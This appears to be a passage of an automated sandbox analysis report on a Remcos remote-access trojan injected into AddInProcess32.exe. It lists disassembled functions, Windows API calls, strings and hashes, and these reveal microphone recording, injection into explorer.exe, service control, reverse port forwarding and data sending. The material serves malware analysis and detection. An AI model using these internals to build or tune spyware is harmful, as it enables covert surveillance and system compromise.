                                                                                                        • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                        Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                        • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 3658366068-0
                                                                                                        • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                        • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                        • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                        • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                        Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                        • GetLastError.KERNEL32 ref: 00454A96
                                                                                                        • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                        • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                        • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                        • GetLastError.KERNEL32 ref: 00454C58
                                                                                                        • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                        • String ID: H
                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                        • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                        • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                        • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                        • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                        Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 65535$udp
                                                                                                        • API String ID: 0-1267037602
                                                                                                        • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                        • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                        • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                        • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                        Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                        • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                        • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                        • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                        • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                        • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                        • _free.LIBCMT ref: 0043946A
                                                                                                        • _free.LIBCMT ref: 00439471
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2441525078-0
                                                                                                        • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                                        • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                        • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                                        • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                        Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                        • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                        • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                        • API String ID: 2956720200-749203953
                                                                                                        • Opcode ID: d95b725b73043253d910ff3d91bf1cb07a4818691f21f3f92f09bd026dddf236
                                                                                                        • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                        • Opcode Fuzzy Hash: d95b725b73043253d910ff3d91bf1cb07a4818691f21f3f92f09bd026dddf236
                                                                                                        • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                        Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                        • String ID: <$@$@FG$@FG$Temp
                                                                                                        • API String ID: 1107811701-2245803885
                                                                                                        • Opcode ID: d3d63833d8ab8f1d961b4a1da5279e22cff83bf31b029fb53a98ed145dc2fc76
                                                                                                        • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                        • Opcode Fuzzy Hash: d3d63833d8ab8f1d961b4a1da5279e22cff83bf31b029fb53a98ed145dc2fc76
                                                                                                        • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                        Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                        • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 00406705
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess
                                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                        • API String ID: 2050909247-4145329354
                                                                                                        • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                        • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                        • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                        • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                        Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                        • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                        • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                        • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                        Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00446DDF
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 00446DEB
                                                                                                        • _free.LIBCMT ref: 00446DF6
                                                                                                        • _free.LIBCMT ref: 00446E01
                                                                                                        • _free.LIBCMT ref: 00446E0C
                                                                                                        • _free.LIBCMT ref: 00446E17
                                                                                                        • _free.LIBCMT ref: 00446E22
                                                                                                        • _free.LIBCMT ref: 00446E2D
                                                                                                        • _free.LIBCMT ref: 00446E38
                                                                                                        • _free.LIBCMT ref: 00446E46
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                        • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                        • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                        • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                        Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Eventinet_ntoa
                                                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                        • API String ID: 3578746661-4192532303
                                                                                                        • Opcode ID: 82bd679fba3198f42106cba0c187218fd625cbdf7536cebf2a2ea51cafd76be0
                                                                                                        • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                        • Opcode Fuzzy Hash: 82bd679fba3198f42106cba0c187218fd625cbdf7536cebf2a2ea51cafd76be0
                                                                                                        • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                        Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer
                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                        • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                        • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                        • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                        • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                        Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                        • API String ID: 1462127192-2001430897
                                                                                                        • Opcode ID: c9e55723ecb2ee04230f435addb8f16ed6a8a05fe378bed3b576d9dff6fd58f4
                                                                                                        • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                        • Opcode Fuzzy Hash: c9e55723ecb2ee04230f435addb8f16ed6a8a05fe378bed3b576d9dff6fd58f4
                                                                                                        • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                        Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _strftime.LIBCMT ref: 00401AD3
                                                                                                          • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                        • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                        • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                        • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                        • API String ID: 3809562944-3643129801
                                                                                                        • Opcode ID: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                                        • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                        • Opcode Fuzzy Hash: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                                        • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                        Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                        • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                        • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                        • waveInStart.WINMM ref: 00401A81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                        • String ID: XCG$`=G$x=G
                                                                                                        • API String ID: 1356121797-903574159
                                                                                                        • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                        • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                        • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                        • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                        Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                          • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                          • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                          • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                        • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                        • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                        • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                        • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                        • String ID: Remcos
                                                                                                        • API String ID: 1970332568-165870891
                                                                                                        • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                        • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                        • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                        • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                        Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                        • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                        • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                        • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                        Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                        • __freea.LIBCMT ref: 00452DAA
                                                                                                        • __freea.LIBCMT ref: 00452DB6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
